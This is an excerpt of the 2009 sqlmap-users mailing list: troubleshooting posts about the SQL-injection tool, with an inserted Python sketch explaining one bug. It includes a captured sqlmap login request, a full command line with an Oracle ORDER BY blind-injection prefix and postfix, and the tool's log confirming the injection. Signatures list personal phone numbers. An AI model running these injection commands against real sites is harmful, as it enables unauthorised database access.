Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: 192.168.200.11:80
Cookie: ASP.NET_SessionId=0gsfp055bufm5ezo0dty242l; CookieLoginAttempts=5; Admin=false
Content-type: application/x-www-form-urlencoded

__VIEWSTATE=dDwtNDI1MDU4NDs7PitrIWDP7fNwEW6ShMscWylYqLTi&txtUserName=jv&txtPassword=asdf&btnSubmit=Submit

This request sends in the POST data that I provided at the command line. This data causes an "Invalid Login" from the login page, which is exactly what happens when a False injected query occurs as well. In fact, the HTML that comes back from this "Not Injected" request is identical to the HTML that comes back from a False injected page.

So, in this situation, I feel that sqlmap isn't requesting the "Not Injected" page correctly. In my mind, that would involve a GET request, with no login data, to login.aspx, not a POST to that page. The GET should return a page that doesn't have the "Invalid Login" text that gets returned to a POST with invalid credentials.

So, can I get sqlmap to detect the "Not Injected" page with a simple GET request, but then perform the sql injection using POST requests? Or is there something else that needs done? I tried changing --method to GET, as well as removing --method, but the GET that is sent for the "Not Injected" page still contains the POST data, which still results in "Invalid Login".

Or am I confused on how this should work?

Thanks!
Richard
|
From: sql p. <sql...@go...> - 2009-06-22 13:10:14
|
Hi guys,

I had the following error when running sqlmap. The error occurred in version 0.6.4 and 0.7rc1. Note that I use prefix and postfix because the injection can only be done in an order by statement. In order by you cannot directly append "AND 1=1". The setup for sql injection works and was verified.

Best Regards,
Jan

./sqlmap.py -u " http://www.example.com/system/listinstances.nav?FORMULARNAME=listinstances&FORMULARSEGMENT=0&FLD_maxElementsListInstances=5&FLD_listInstancesOrderBy=1" -p FLD_listInstancesOrderBy --string=rowHighSmall --proxy= http://127.0.0.1:8080/--cookie="JSESSIONID=1RjDK1vK9NMkyJ7tWPWks9wTYyYz22h5pTQ2qTWVx6pQVhxC2nVg" --delay=1 --prefix="%2b(select%20case%20when%201=1" --postfix="then%201%20else%201/0%20end%20from%20dual)" --sql-query="select 'bla' from dual"

/home/jan/Tools/sqlmap-0.6.4/lib/core/convert.py:27: DeprecationWarning: the md5 module is deprecated; use hashlib instead
  import md5
/home/jan/Tools/sqlmap-0.6.4/lib/core/convert.py:28: DeprecationWarning: the sha module is deprecated; use the hashlib module instead
  import sha

sqlmap/0.6.4 coded by Bernardo Damele A. G. <ber...@gm...>
and Daniele Bellucci <dan...@gm...>

[*] starting at: 14:53:19

[14:53:19] [WARNING] the testable parameter 'FLD_listInstancesOrderBy' you provided is not into the Cookie
[14:53:19] [INFO] testing connection to the target url
[14:53:20] [INFO] testing if the provided string is within the target URL page content
[14:53:22] [INPUT] you provided an HTTP Cookie header value. The target url provided its own Cookie within the HTTP Set-Cookie header. Do you want to continue using the HTTP Cookie values that you provided? [Y/n] Y
[14:53:26] [INFO] testing if GET parameter 'FLD_listInstancesOrderBy' is dynamic
[14:53:28] [INFO] confirming that GET parameter 'FLD_listInstancesOrderBy' is dynamic
[14:53:31] [INFO] GET parameter 'FLD_listInstancesOrderBy' is dynamic
[14:53:31] [INFO] testing sql injection on GET parameter 'FLD_listInstancesOrderBy' with 0 parenthesis
[14:53:31] [INFO] testing custom injection on GET parameter 'FLD_listInstancesOrderBy'
[14:53:35] [INFO] confirming custom injection on GET parameter 'FLD_listInstancesOrderBy'
[14:53:37] [INFO] GET parameter 'FLD_listInstancesOrderBy' is custom injectable
[14:53:37] [INFO] testing for parenthesis on injectable parameter
[14:53:37] [INFO] testing MySQL
[14:53:38] [WARNING] the back-end DMBS is not MySQL
[14:53:38] [INFO] testing Oracle
[14:53:41] [INFO] confirming Oracle
[14:53:43] [INFO] the back-end DBMS is Oracle
web application technology: Apache, Servlet 2.5, JSP, JSP 2.1
back-end DBMS: Oracle

[14:53:43] [INFO] fetching SQL SELECT statement query output: 'select 'bla' from dual'
[14:53:43] [INPUT] can the SQL query provided return multiple entries? [Y/n] n
[14:53:47] [INFO] query: SELECT NVL(CAST(CHR(98)||CHR(108)||CHR(97) AS VARCHAR(4000)), CHR(32)) FROM dual
[14:53:47] [INFO] retrieved:
[14:53:47] [ERROR] unhandled exception in sqlmap/0.6.4, please copy the command line and the following text and send by e-mail to sql...@li.... The developers will fix it as soon as possible:

sqlmap version: 0.6.4
Python version: 2.6.2
Operating system: linux2

Traceback (most recent call last):
  File "./sqlmap.py", line 81, in main
    start()
  File "/home/jan/Tools/sqlmap-0.6.4/lib/controller/controller.py", line 255, in start
    action()
  File "/home/jan/Tools/sqlmap-0.6.4/lib/controller/action.py", line 123, in action
    dumper.string(conf.query, conf.dbmsHandler.sqlQuery(conf.query))
  File "/home/jan/Tools/sqlmap-0.6.4/plugins/generic/enumeration.py", line 1078, in sqlQuery
    output = inject.getValue(query, fromUser=True)
  File "/home/jan/Tools/sqlmap-0.6.4/lib/request/inject.py", line 364, in getValue
    value = __goInferenceProxy(expression, fromUser, expected)
  File "/home/jan/Tools/sqlmap-0.6.4/lib/request/inject.py", line 297, in __goInferenceProxy
    outputs = __goInferenceFields(expression, expressionFields, expressionFieldsList, payload, expected)
  File "/home/jan/Tools/sqlmap-0.6.4/lib/request/inject.py", line 100, in __goInferenceFields
    output = __goInference(payload, expressionReplaced)
  File "/home/jan/Tools/sqlmap-0.6.4/lib/request/inject.py", line 60, in __goInference
    count, value = bisection(payload, expression, length=length)
  File "/home/jan/Tools/sqlmap-0.6.4/lib/techniques/blind/inference.py", line 231, in bisection
    val = getChar(index)
  File "/home/jan/Tools/sqlmap-0.6.4/lib/techniques/blind/inference.py", line 101, in getChar
    forgedPayload = payload % (expressionUnescaped, idx, limit)
ValueError: unsupported format character 'b' (0x62) at index 104

[*] shutting down at: 14:53:47
|
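The ValueError in the traceback above is consistent with the URL-encoded prefix (%2b...) reaching Python's % operator, which reads %2b as a conversion spec. The sketch below is an added illustration, not sqlmap's code and not part of the original post: the template and function names are hypothetical, and the prefix and postfix are the ones from the posted command line.

```python
import re

# Affixes as posted in the message above (URL-encoded, so they contain '%').
PREFIX = "%2b(select%20case%20when%201=1"
POSTFIX = "then%201%20else%201/0%20end%20from%20dual)"

# Hypothetical template with three placeholders, filled the same way as the
# traceback's `payload % (expressionUnescaped, idx, limit)` call.
TEMPLATE = " cmp(%s, %d) > %d "
ARGS = ("expr", 1, 64)


def raw_percent_tokens(text):
    """List each lone '%' plus up to two following characters in raw (not yet
    escaped) text; %-formatting would start a conversion spec at each one."""
    return re.findall(r"%(?!%)[^%]{0,2}", text)


def build_naive(prefix, template, postfix, args):
    """Affixes joined before formatting: their '%' sequences get parsed."""
    return (prefix + template + postfix) % args


def naive_error(prefix, template, postfix, args):
    """Return the exception text the naive build raises, or None."""
    try:
        build_naive(prefix, template, postfix, args)
    except (ValueError, TypeError) as exc:
        return "%s: %s" % (type(exc).__name__, exc)
    return None


def build_escaped(prefix, template, postfix, args):
    """Double every '%' in the affixes so formatting emits them literally."""
    def esc(text):
        return text.replace("%", "%%")
    return (esc(prefix) + template + esc(postfix)) % args


def build_late(prefix, template, postfix, args):
    """Format the template alone, then attach the affixes untouched."""
    return prefix + (template % args) + postfix


if __name__ == "__main__":
    print(raw_percent_tokens(PREFIX))
    print(naive_error(PREFIX, TEMPLATE, POSTFIX, ARGS))
    print(build_late(PREFIX, TEMPLATE, POSTFIX, ARGS))
```

Either fix keeps user-supplied text out of the format-spec parser: escape it before it joins the template, or attach it only after formatting is done.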
From: Daniele B. <dan...@gm...> - 2009-06-14 13:07:19
|
There could be some potential features but, can you introduce it a little more? What are the main differences with other sql inj tools? What is the 'OXCP' protocol and why do you need it..

Tnx

On Sat, Jun 13, 2009 at 10:11 AM, Christian Eric EDJENGUELE<c_e...@ya...> wrote:
>
> Hi steve,
> if you're thinking about REST for webservices assessment, then the answer is no.
> you should consider another tool like OpenSQLi-NG (not available for public yet, I'll do so very soon) http://opensqling.sourceforge.net/ , it support webservices assessment with both a messaging layer ( such as SOAP, or session tracking via HTTP cookies) and REST see the following for available features: http://opensqling.sourceforge.net/?page_id=8#features
>
>
> Best
> ---
> Christian Eric Edjenguele
> IT Security Software Developer & Researcher / Business Developer / Enterprise Software Architect
> mobile (IT): +39 3408580513
>
>
>
> ----- Original message -----
>> From: Steve Pinkham <ste...@gm...>
>> To: sql...@li...
>> Sent: Friday 12 June 2009, 23:33:39
>> Subject: [sqlmap-users] REST style parameters?
>>
>> Does SQLmap have any way to support REST style URL parameters, such as:
>> "http://www.example.com/parm1/parm2" ?
>> I couldn't find any information on this in the documentation.
>> Thanks
>> --
>> | Steven E. Pinkham |
>> | GPG public key ID CD31CAFB |
|
From: Daniele B. <dan...@gm...> - 2009-06-14 03:14:53
|
Hi,

I'm the original author of sqlmap even if Bernardo replaced me years ago. I would like to know where and what the problem is.. despite which tool is more appropriate, how the doc has been written, who says what and so on

2009/6/14, Steve Pinkham <ste...@gm...>:
> Bernardo Damele A. G. wrote:
>> Good question! Maybe the answer is SPAM? Maybe 'cause we *desperately*
>> need the nth useless/limited/unmaintained/crappy SQL injection tool?
>> I've counted over 30 open source tools so far, tested about 20, guess
>> how many do what they claim.. Very few, and guess how many do exploit
>> deeply the flaw and are highly customizable and flexible.. Even less.
>>
>> On Sat, Jun 13, 2009 at 19:29, <ja...@ev...> wrote:
>>> Why would you suggest he use another tool which has no public releases?
>>> [...]
>>
>
> Yeah, that's why I'm on the SQLmap list, because it Just Works for most
> things I want to use it for. Not to say I wouldn't welcome another good
> tool, but I've used more than my share of partially to non-functioning
> often malware infested SQL tools to want to continue to test more.
>
> Obviously writing a generic tool that covers the necessary functionality
> is much harder than most people realize when they get going.
> --
> | Steven E. Pinkham |
> | GPG public key ID CD31CAFB |
|
From: Steve P. <ste...@gm...> - 2009-06-14 02:17:02
|
Bernardo Damele A. G. wrote:
> Good question! Maybe the answer is SPAM? Maybe 'cause we *desperately*
> need the nth useless/limited/unmaintained/crappy SQL injection tool?
> I've counted over 30 open source tools so far, tested about 20, guess
> how many do what they claim.. Very few, and guess how many do exploit
> deeply the flaw and are highly customizable and flexible.. Even less.
>
> On Sat, Jun 13, 2009 at 19:29, <ja...@ev...> wrote:
>> Why would you suggest he use another tool which has no public releases?
>> [...]
>

Yeah, that's why I'm on the SQLmap list, because it Just Works for most things I want to use it for. Not to say I wouldn't welcome another good tool, but I've used more than my share of partially to non-functioning often malware infested SQL tools to want to continue to test more.

Obviously writing a generic tool that covers the necessary functionality is much harder than most people realize when they get going.

--
| Steven E. Pinkham |
| GPG public key ID CD31CAFB |
|
From: Bernardo D. A. G. <ber...@gm...> - 2009-06-13 20:16:01
|
Good question! Maybe the answer is SPAM? Maybe 'cause we *desperately* need the nth useless/limited/unmaintained/crappy SQL injection tool? I've counted over 30 open source tools so far, tested about 20, guess how many do what they claim.. Very few, and guess how many do exploit deeply the flaw and are highly customizable and flexible.. Even less.

On Sat, Jun 13, 2009 at 19:29, <ja...@ev...> wrote:
> Why would you suggest he use another tool which has no public releases?
> [...]

--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobiles: +447788962949 (UK), +393493821385 (IT)
PGP Key ID: 0x05F5A30F
|
From: <ja...@ev...> - 2009-06-13 18:29:26
|
Why would you suggest he use another tool which has no public releases?

On Sat, 13 Jun 2009, Steve Pinkham wrote:
> Bernardo Damele A. G. wrote:
>> Hi Steve,
>>
>> On Fri, Jun 12, 2009 at 22:33, Steve Pinkham<ste...@gm...> wrote:
>>> Does SQLmap have any way to support REST style URL parameters, such as:
>>> "http://www.example.com/parm1/parm2" ?
>>> I couldn't find any information on this in the documentation.
>>
>> As I said several times already on this mailing list, this will come
>> in the long run. sqlmap does not support it yet.
>>
>> Cheers,
>
> Sorry, I did search the mailing list archive on sourceforge for REST,
> parameter(s), and other queries, and nothing related came up. It does
> now ;-)
> I also googled, searched the documentation and hunted for a bug tracker
> first. I apologize if there's some other FM I should have R'd, but I
> did attempt.
>
> --
> | Steven E. Pinkham |
> | GPG public key ID CD31CAFB |
|
From: Steve P. <ste...@gm...> - 2009-06-13 14:07:47
|
Bernardo Damele A. G. wrote:
> Hi Steve,
>
> On Fri, Jun 12, 2009 at 22:33, Steve Pinkham<ste...@gm...> wrote:
>> Does SQLmap have any way to support REST style URL parameters, such as:
>> "http://www.example.com/parm1/parm2" ?
>> I couldn't find any information on this in the documentation.
>
> As I said several times already on this mailing list, this will come
> in the long run. sqlmap does not support it yet.
>
> Cheers,

Sorry, I did search the mailing list archive on sourceforge for REST, parameter(s), and other queries, and nothing related came up. It does now ;-)

I also googled, searched the documentation and hunted for a bug tracker first. I apologize if there's some other FM I should have R'd, but I did attempt.

--
| Steven E. Pinkham |
| GPG public key ID CD31CAFB |
|
From: Christian E. E. <c_e...@ya...> - 2009-06-13 08:11:58
|
Hi Steve,

If you're thinking about REST for webservices assessment, then the answer is no. You should consider another tool like OpenSQLi-NG (not available for public yet, I'll do so very soon) http://opensqling.sourceforge.net/ , it supports webservices assessment with both a messaging layer (such as SOAP, or session tracking via HTTP cookies) and REST. See the following for available features: http://opensqling.sourceforge.net/?page_id=8#features

Best
---
Christian Eric Edjenguele
IT Security Software Developer & Researcher / Business Developer / Enterprise Software Architect
mobile (IT): +39 3408580513

----- Original message -----
> From: Steve Pinkham <ste...@gm...>
> To: sql...@li...
> Sent: Friday 12 June 2009, 23:33:39
> Subject: [sqlmap-users] REST style parameters?
>
> Does SQLmap have any way to support REST style URL parameters, such as:
> "http://www.example.com/parm1/parm2" ?
> I couldn't find any information on this in the documentation.
> Thanks
> --
> | Steven E. Pinkham |
> | GPG public key ID CD31CAFB |
|
From: Bernardo D. A. G. <ber...@gm...> - 2009-06-13 07:57:37
|
Hi Steve,

On Fri, Jun 12, 2009 at 22:33, Steve Pinkham<ste...@gm...> wrote:
> Does SQLmap have any way to support REST style URL parameters, such as:
> "http://www.example.com/parm1/parm2" ?
> I couldn't find any information on this in the documentation.

As I said several times already on this mailing list, this will come in the long run. sqlmap does not support it yet.

Cheers,
--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobiles: +447788962949 (UK), +393493821385 (IT)
PGP Key ID: 0x05F5A30F
|
From: Steve P. <ste...@gm...> - 2009-06-12 21:34:56
|
Does SQLmap have any way to support REST style URL parameters, such as:
"http://www.example.com/parm1/parm2" ?
I couldn't find any information on this in the documentation.

Thanks
--
| Steven E. Pinkham |
| GPG public key ID CD31CAFB |
|